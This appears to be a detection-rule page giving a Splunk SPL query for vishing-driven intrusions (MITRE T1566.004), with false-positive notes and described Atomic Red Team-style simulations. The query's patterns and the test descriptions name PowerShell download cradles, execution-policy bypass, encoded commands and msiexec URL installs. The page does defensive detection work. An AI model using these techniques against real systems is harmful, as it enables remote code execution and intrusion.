T1566.004 Splunk · SPL

Detect Spearphishing Voice in Splunk

Adversaries use voice communications (phone calls, VoIP) to socially engineer victims into granting system access, installing remote management tools (RMM), executing malicious scripts, or approving fraudulent MFA prompts. The attacker typically impersonates IT support or a trusted authority, creating urgency to bypass the victim's critical thinking. Unlike phishing email techniques, vishing leaves no direct technical artifact from the call itself — detection must focus on the downstream behaviors: abnormal RMM tool installation, suspicious process chains spawned during or after remote sessions, and MFA anomaly patterns. Storm-1811 is a documented threat group using this technique, directing victims to open Quick Assist (a built-in Windows remote desktop tool) to hand over system control to the attacker posing as Microsoft or internal IT support.

MITRE ATT&CK

Tactic
Initial Access
Technique
T1566 Phishing
Sub-technique
T1566.004 Spearphishing Voice
Canonical reference
https://attack.mitre.org/techniques/T1566/004/

SPL Detection Query

Splunk (SPL)
spl 
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| eval Image_lower=lower(Image)
| eval ParentImage_lower=lower(ParentImage)
| eval CommandLine_lower=lower(CommandLine)
| eval IsRMMParent=if(match(ParentImage_lower, "(anydesk|teamviewer|screenconnect|connectwise|quickassist|remotepc|logmeinrescue|atera|splashtop|supremo|ultraviewer|rustdesk|ammyy|getscreen|zoho_assist|msra|fixmeit|dwagent)"), 1, 0)
| eval IsRMMProcess=if(match(Image_lower, "(anydesk|teamviewer|screenconnect|connectwise|quickassist|remotepc|logmeinrescue|atera|splashtop|supremo|ultraviewer|rustdesk|ammyy|getscreen|zoho_assist|msra|fixmeit|dwagent)"), 1, 0)
| eval IsSuspiciousChild=if(IsRMMParent=1 AND match(Image_lower, "(powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin|msiexec|curl\.exe|wget\.exe)"), 1, 0)
| eval HasEncodedCmd=if(match(CommandLine_lower, "(-encodedcommand|-enc\s|-ec\s)"), 1, 0)
| eval HasDownloadCradle=if(match(CommandLine_lower, "(invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer|certutil.*urlcache)"), 1, 0)
| eval HasBypass=if(match(CommandLine_lower, "(-executionpolicy\s+bypass|iex\(|-windowstyle\s+hidden)"), 1, 0)
| eval IsQuickAssistParent=if(match(ParentImage_lower, "(quickassist|msra)"), 1, 0)
| eval RiskScore=IsSuspiciousChild + HasEncodedCmd + HasDownloadCradle + HasBypass + (IsQuickAssistParent * 2)
| where IsSuspiciousChild=1 OR (IsRMMProcess=1 AND (HasEncodedCmd=1 OR HasDownloadCradle=1 OR HasBypass=1)) OR (IsQuickAssistParent=1)
| eval DetectionType=case(
    IsQuickAssistParent=1, "QuickAssist_Child_Execution",
    IsSuspiciousChild=1, "RMM_Spawned_Suspicious_Child",
    IsRMMProcess=1, "RMM_Suspicious_Cmdline",
    true(), "Unknown")
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, DetectionType, IsSuspiciousChild, HasEncodedCmd, HasDownloadCradle, HasBypass, RiskScore
| sort - RiskScore, - _time
high severity medium confidence

Detects post-vishing behavioral indicators using Sysmon Event ID 1 (Process Create) logs. Evaluates three overlapping patterns: RMM tools spawning suspicious child processes (interpreters and LOLBins), RMM processes executing with download cradle or bypass command line arguments, and Quick Assist (Storm-1811 TTP) spawning any child process. The cumulative risk score weights Quick Assist activity double due to its documented abuse by threat actors. Requires Sysmon deployed with process creation logging including parent process data.

Data Sources

Process: Process CreationCommand: Command ExecutionSysmon Event ID 1

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Legitimate IT helpdesk using Quick Assist or AnyDesk to run diagnostic scripts on user machines during support sessions
  • MSP-deployed RMM agents (ConnectWise, Atera) that execute scripted patch deployments or configuration management tasks
  • Corporate IT departments using TeamViewer for remote onboarding that involves running PowerShell configuration scripts
  • Vendor remote support sessions for enterprise software (ERP, HR systems) that use their own remote access clients and run diagnostic tools
  • Automated software deployment pipelines that happen to run through an RMM agent interface
Download portable Sigma rule (.yml)

Other platforms for T1566.004

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Silent AnyDesk Installation (Vishing Initial Access Simulation)

    Expected signal: Sysmon Event ID 11 (File Create): AnyDesk.exe written to %TEMP%. Sysmon Event ID 1 (Process Create): AnyDesk.exe spawned with --portable argument, parent process is PowerShell. Sysmon Event ID 3 (Network Connection): Outbound connection to download.anydesk.com (185.34.32.x) on port 443 for download, and to AnyDesk relay servers on port 7070 or 443 after launch. Windows Security Event 4688 if command line auditing enabled.

  2. Test 2Quick Assist Session Initiation with Child PowerShell (Storm-1811 TTP)

    Expected signal: Sysmon Event ID 1 (Process Create): quickassist.exe started. Sysmon Event ID 1 (Process Create): powershell.exe started with parent process being the test script's shell (simulating quick assist parent). The detection query branch 'QuickAssist_Child_Execution' specifically looks for Quick Assist spawning PowerShell. Microsoft-Windows-RemoteAssistance/Operational Event ID 1 logged when Quick Assist initializes.

  3. Test 3Post-Vishing Script Delivery via RMM Session Simulation

    Expected signal: Sysmon Event ID 1 (Process Create): powershell.exe with -ExecutionPolicy Bypass, -WindowStyle Hidden, and Net.WebClient/DownloadString in CommandLine. Sysmon Event ID 3 (Network Connection): attempt to connect to 127.0.0.1:9999 (will fail — no listener). Sysmon Event ID 11 (File Create): vishing-stage2-test.txt written to %TEMP%. PowerShell ScriptBlock Log Event ID 4104: full deobfuscated script content captured.

  4. Test 4Callback Phishing URL Pattern Execution (Luna Moth Simulation)

    Expected signal: Sysmon Event ID 1 (Process Create): cmd.exe spawning msiexec.exe with HTTP URL argument. Sysmon Event ID 3 (Network Connection): msiexec.exe attempting outbound HTTP connection to 127.0.0.1:9998 (will fail). Windows Security Event 4688: msiexec.exe process creation with URL in command line if command line auditing enabled. The msiexec with HTTP URL pattern is characteristic of vishing-directed software installation.

Last updated: 2026-03-12 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1566.004 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1566Phishing

Related Sub-techniques

T1566.001Spearphishing AttachmentT1566.002Spearphishing LinkT1566.003Spearphishing via Service

Related Techniques

T1219Remote Access ToolsT1621Multi-Factor Authentication Request GenerationT1656ImpersonationT1204User ExecutionT1059.001PowerShellT1105Ingress Tool TransferT1566.002Spearphishing LinkT1078Valid AccountsT1114.001Local Email CollectionT1539Steal Web Session Cookie

Same Tactic: Initial Access

Popular Detections